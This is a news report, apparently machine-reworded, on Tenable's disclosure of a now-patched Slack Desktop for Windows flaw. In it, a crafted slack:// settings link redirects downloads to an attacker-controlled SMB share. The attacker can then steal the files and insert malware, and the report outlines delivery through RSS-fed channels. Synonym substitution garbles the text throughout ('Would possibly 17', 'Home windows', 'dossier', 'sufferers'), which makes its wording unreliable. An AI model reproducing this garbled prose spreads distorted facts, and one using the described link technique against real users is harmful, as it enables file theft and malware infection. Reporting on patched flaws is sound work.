On Would possibly 17, researchers at Tenable revealed that they had discovered a vulnerability within the Home windows model of the desktop software for Slack, the commonly used collaboration carrier. The vulnerability, in Slack Desktop model three.three.7 for Home windows, will have been used to switch the vacation spot of a dossier obtain from a Slack dialog to a far off dossier percentage owned by way of an attacker. This is able to permit the attacker not to simplest thieve the recordsdata that had been downloaded by way of a focused person, but in addition permit the attacker to vary the recordsdata and upload malware to them. When sufferers opened the recordsdata, they’d get a doubtlessly nasty marvel.
Tenable reported the vulnerability to Slack by means of HackerOne. Slack has issued an replace to the Home windows desktop consumer that closes the vulnerability.
The prospective assault used a weak point in the best way the “slack://” protocol handler was once applied within the Home windows software. Via making a crafted hyperlink posted in a Slack channel, the attacker may just adjust the default settings of the buyer—converting the obtain listing, as an example, to a brand new location with a URL comparable to “slack://settings/?replace=”. That trail may well be directed to a Server Message Block (SMB) file-sharing location managed by way of the attacker. As soon as clicked, all long run downloads can be dropped onto the attacker’s SMB server. This hyperlink may well be disguised as a Internet hyperlink—in a proof-of-concept, the malicious Slack assault posed as a hyperlink to Google.
In a weblog submit, Tenable’s David Wells reviewed a number of ways in which this vulnerability may well be used maliciously. As soon as the attacker had modified the default obtain location, “the attacker will have now not simplest stolen the file, however even inserted malicious code in it in order that when opened by way of sufferer after obtain (in the course of the Slack software), their system would were inflamed,” Wells wrote.
An attacker would not even should be a member of a Slack channel to effectively inject the URL, Wells famous—the hyperlink may well be fed right into a channel by means of an RSS feed, as an example, as Slack channels can also be set as much as subscribe to them. “I may just make a submit to a very talked-about Reddit group that Slack customers around the globe are subscribed to,” Wells defined. That submit may just come with a Internet hyperlink “that may redirect to our malicious slack:// hyperlink and alter settings when clicked.” Then again, this assault would most probably throw up a conversation field caution Internet hyperlink was once seeking to open Slack—so it would not paintings except a sufferer clicked with approval.